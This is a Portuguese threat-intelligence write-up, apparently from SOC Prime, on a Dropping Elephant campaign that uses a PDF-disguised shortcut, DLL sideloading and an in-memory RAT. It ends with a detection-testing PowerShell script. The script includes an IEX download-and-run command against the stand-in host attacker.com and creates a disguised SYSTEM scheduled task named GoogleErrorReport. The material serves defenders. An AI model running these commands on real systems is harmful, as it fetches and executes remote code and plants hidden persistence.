SOC Prime Bias: Crítico

19 Jun 2026 07:55 UTC

Malware em Alta: Dentro da Cadeia de Loader do Dropping Elephant

Author Photo
SOC Prime Team linkedin icon Seguir
Malware em Alta: Dentro da Cadeia de Loader do Dropping Elephant
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Uma campanha sofisticada atribuída ao Dropping Elephant utiliza documentos de isca temáticos da China para entregar um trojan de acesso remoto atualizado e residente em memória. A invasão depende do carregamento de DLL através de um binário legítimo da Microsoft e do carregador de shellcode Donut para evitar a detecção baseada em disco. A carga final também utiliza métodos avançados de evasão, incluindo achatamento de fluxo de controle e reconstrução de API em tempo de execução.

Investigação

Pesquisadores da Rapid7 descobriram a ameaça durante uma caça proativa que começou com um atalho malicioso do Windows disfarçado de documento PDF. Sua investigação seguiu a cadeia de carga útil desde o estágio inicial em chinagreenenergy[.]org através do carregamento de DLL de APPWIZ.cpl até a execução de um RAT em memória. A análise em nível de código com Diaphora confirmou uma linhagem comum com amostras anteriores do Dropping Elephant, apesar de extensa reformulação.

Mitigação

Os defensores devem priorizar detecções comportamentais, como arquivos de atalho lançando PowerShell e estágio de carga útil suspeito em C:UsersPublic. Monitorar tarefas agendadas com nomes incomuns e identificar o carregamento de DLL de diretórios inesperados também é importante. Além disso, defesas em endpoints precisam de visibilidade em nível de memória para detectar alterações no AMSI, WLDP e ETW.

Resposta

Se essa atividade for detectada, isole imediatamente os sistemas afetados para interromper o tráfego de comando e controle. Realize forense na memória para identificar o RAT injetado e inspecione as tarefas agendadas para persistência. Logs de rede também devem ser revisados para tráfego HTTPS não autorizado para os domínios de C2 conhecidos e para quaisquer sinais de exfiltração de arquivos.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Check de Pré-voo de Telemetria e Linha de Base deve ter sido aprovado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para disparar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa & Comandos de Ataque: O adversário visa estabelecer persistência e executar um downloader. Para evitar filtragens padrão de e-mails, eles usam um arquivo de atalho chamado GRES3001.lnk que aparece como um PDF. Quando clicado, ele chama conhost.exe para executar um script PowerShell. Simultaneamente, eles estabelecem persistência criando uma tarefa agendada chamada GoogleErrorReport projetada para executar Fondue.exe de um diretório público, disfarçado como um legítimo relator de erro do Google para evitar inspeção casual.

  • Script de Teste de Regressão:

    # 1. Simular o comportamento de Atalho/Conhost
    # Simulamos a execução de conhost.exe com a string específica na linha de comando
    Start-Process "conhost.exe" -ArgumentList "/c PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" 
    # Nota: Para corresponder estritamente à 'CommandLine contains GRES3001.lnk', simulamos a chamada de processo como se tivesse vindo desse arquivo.
    # Como não podemos facilmente falsificar o nome do processo pai em um script simples, simulamos a string de linha de comando esperada.
    Write-Host "[!] Simulando disparo do GRES3001.lnk..."
    $SimulatedCmd = "conhost.exe /c GRES3001.lnk PowerShell.exe -Command Write-Host 'Malware Loaded'"
    # Em um ambiente real, o campo 'CommandLine' no Sysmon conteria a string alvo.
    
    # 2. Simular a Tarefa Agendada e o side-loading do Fondue.exe
    Write-Host "[!] Simulando tarefa agendada GoogleErrorReport..."
    New-Item -Path "C:UsersPublicFondue.exe" -ItemType File -Force
    Set-Content -Path "C:UsersPublicFondue.exe" -Value "Dummy Payload"
    
    $TaskName = "GoogleErrorReport"
    $Action = New-ScheduledTaskAction -Execute "C:UsersPublicFondue.exe"
    Register-ScheduledTask -Action $Action -TaskName $TaskName -Description "Tarefa Simulada Dropping Elephant" -User "SYSTEM" -Force
    
    Write-Host "[+] Simulação Completa. Verifique SIEM para alertas."
  • Comandos de Limpeza:

    # Remover o binário malware dummy
    Remove-Item -Path "C:UsersPublicFondue.exe" -Force
    
    # Remover a tarefa agendada maliciosa
    Unregister-ScheduledTask -TaskName "GoogleErrorReport" -Confirm:$false
    
    Write-Host "[+] Limpeza Completa."